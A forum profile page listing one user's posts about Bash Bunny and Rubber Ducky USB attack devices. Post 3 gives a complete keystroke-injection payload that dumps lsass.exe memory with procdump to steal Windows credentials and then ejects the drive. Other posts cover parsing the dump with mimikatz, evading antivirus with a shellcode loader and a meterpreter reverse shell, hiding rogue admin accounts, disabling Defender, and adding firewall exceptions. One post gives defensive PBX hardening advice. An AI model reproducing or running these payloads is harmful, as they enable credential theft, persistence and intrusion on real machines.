Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Recent Profile Visitors

2,471 profile views

rottingsun's Achievements


Newbie (1/14)

  1. There's a few basic strategies, some hardware based and some software based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly. Here's a presentation that's FreePBX based but includes general best practices. https://player.vimeo.com/video/130328541
  2. With mimikatz and all the derivatives being flagged more and more these days, I find it more effective to take a memdump of lsass using procdump, then running it through mimi in minidump mode.
  3. Here's my working code for running an executable (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object. LED Y 100 source bunny_helpers.sh LED B 100 ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING powershell Start-Process powershell -Verb runAs Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500 Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q DELAY 500 Q ENTER Q DELAY 500 Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp Q ENTER Q DELAY 200 Q STRING \$driveEject\=New-Object -comObject Shell.Application Q ENTER Q DELAY 200 Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 200 Q STRING exit Q ENTER LED FINISH
  4. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both.
  5. The latest Empire stagers actually have a bunny target.
  6. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  7. I believe RDP locks the session of the currently logged in user, which would be a dead give away. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
  8. KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
  9. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
  10. I would but I don't wanna be hungover for work tomorrow.
  11. Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - #OS: Windows (Requires Powershell and Admin Rights) This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably alot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
  12. Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including: - The one I previously posted about. That is, making the new user invisible to the Windows logon screen. - Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here. - Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder. - Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP. The possibilities are endless. I guess I just need to break down and order a bunny.
  13. Very nice payload. It'd be sweet to go even a step further and hide the new user from the Windows login screen with reg commands, as per the technique outlined in this post: http://www.windowscentral.com/how-hide-specific-user-accounts-sign-screen-windows-10
  14. Here is what I always used for enumerating the duck by the label DUCKY - for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duckydrive=%d Then the ducky can actually be referenced by letter with the env var %duckydrive%.
  15. This. If your company can afford one, you will be blown away vs all others.
  • Create New...